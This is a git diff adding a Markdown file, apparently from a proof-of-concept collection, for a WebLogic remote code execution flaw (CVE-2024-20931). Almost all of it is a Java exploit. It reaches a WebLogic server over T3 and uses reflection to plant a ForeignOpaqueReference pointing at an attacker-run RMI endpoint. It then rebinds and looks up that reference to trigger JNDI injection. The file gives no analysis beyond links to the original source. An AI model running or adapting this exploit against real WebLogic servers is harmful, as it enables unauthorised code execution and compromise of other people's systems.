diff --git a/Weblogic远程代码执行(CVE-2024-20931).md b/Weblogic远程代码执行(CVE-2024-20931).md
new file mode 100644
index 0000000..8336f64
--- /dev/null
+++ b/Weblogic远程代码执行(CVE-2024-20931).md
@@ -0,0 +1,54 @@
+## Weblogic远程代码执行(CVE-2024-20931)
+
+## poc
+```
+package com.supeream;
+
+import weblogic.deployment.jms.ForeignOpaqueReference;
+
+import javax.naming.Context;
+import javax.naming.InitialContext;
+import java.lang.reflect.Field;
+import java.util.Hashtable;
+
+public class CVE_2024_209321 {
+ public static void main(String[] args) throws Exception {
+ String JNDI_FACTORY = "weblogic.jndi.WLInitialContextFactory";
+
+ // 创建用来远程绑定对象的InitialContext
+ String url = "t3://127.0.0.1:7001"; // 目标机器
+ Hashtable env1 = new Hashtable();
+ env1.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);
+ env1.put(Context.PROVIDER_URL, url); // 目标
+ InitialContext c = new InitialContext(env1);
+
+ // ForeignOpaqueReference的jndiEnvironment属性
+ Hashtable env2 = new Hashtable();
+ env2.put("java.naming.factory.initial", "oracle.jms.AQjmsInitialContextFactory");
+ env2.put("datasource", "rmi://127.0.0.1:1099/ygevmj");
+
+ // ForeignOpaqueReference的jndiEnvironment和remoteJNDIName属性
+ ForeignOpaqueReference f = new ForeignOpaqueReference();
+ Field jndiEnvironment = ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");
+ jndiEnvironment.setAccessible(true);
+ jndiEnvironment.set(f, env2);
+ Field remoteJNDIName = ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");
+ remoteJNDIName.setAccessible(true);
+ String ldap = "rmi://127.0.0.1:1099/ygevmj";
+ remoteJNDIName.set(f, ldap);
+
+ // 远程绑定ForeignOpaqueReference对象
+ c.rebind("glassy", f);
+
+ // lookup查询ForeignOpaqueReference对象
+ try {
+ c.lookup("glassy");
+ } catch (Exception e) {
+ }
+ }
+}
+```
+
+## 漏洞来源
+- https://github.com/GlassyAmadeus/CVE-2024-20931
+- https://glassyamadeus.github.io/2024/01/31/CVE_2024_20931/